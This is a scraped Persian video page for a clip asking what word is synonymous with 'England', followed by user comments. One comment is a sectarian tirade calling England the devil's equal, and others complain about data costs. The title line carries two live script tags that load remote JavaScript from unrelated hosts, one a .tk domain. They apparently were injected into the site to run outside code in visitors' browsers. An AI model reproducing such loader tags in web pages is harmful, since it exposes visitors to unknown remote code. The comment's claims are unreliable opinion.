لفظ انگلیس مترادف چیست؟


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>کليپ لفظ انگلیس مترادف چیست؟<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
5

- 
0
ارسال در 1396/6/12 ساعت 09:32 2017-9-3 09:32:14
mohsen
توسط mohsen


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)
 • تو خود حدیث مفصل بخوان از این مجمل
  ---
  انگلیس پیر با همه ی رفتارها و گفتارها و پندارهای خدا ستیزش در طول قرنهای متمادی تا کنون مترادف و مساوی با ابلیس حقیر بوده که جهان ر با جنایتهای خدا ستیز خود آلوده کرده و به حضیض رسانده است.
  انگلیس پیر با کمک شیطان حقیر دین شناسان را با سرگرم کردن به من در آوردیها و سکوت و مدارا با انحرافهای من در آوردی که بنام دین و مذهب به اذهان متدینان تزریق کرده از کار و فعالیت روشنگری خدا پسندانه باز داشته است.
  ظاهرا تا ظهور مهدی موعود (عج) و اتمام حجت نهایی حق علیه باطلها ، این خواب خرگوشی عمیق مردم متدین پاک دل و دین شاسان غافل که از روشن گریهای قرآن خبری ندارند من در آوردیها رواج و ادامه خواهند داشت و تنها بیدار شدگان از این خواب پیش از ظهور مبارک ، با خواست خداوند منان پیروز و رستگار خواهند بود.

 • alir 96/6/12 ساعت 15:11

  لینک صوتی را هم قرار بدید بنده اینترنت 1 ماهه دارم با حجم 4 گیگ کلیپ بالای 4 مگابایت برام نمیصرفه دانلود کنم مثلا تو کشور اسلامی هم زندگی میکنیم مسولین که گوش نمیدن شماهم گوش نمیدین !

 • عباد 96/6/12 ساعت 17:01

  ملتی که شهادت دراد اسارت ندارد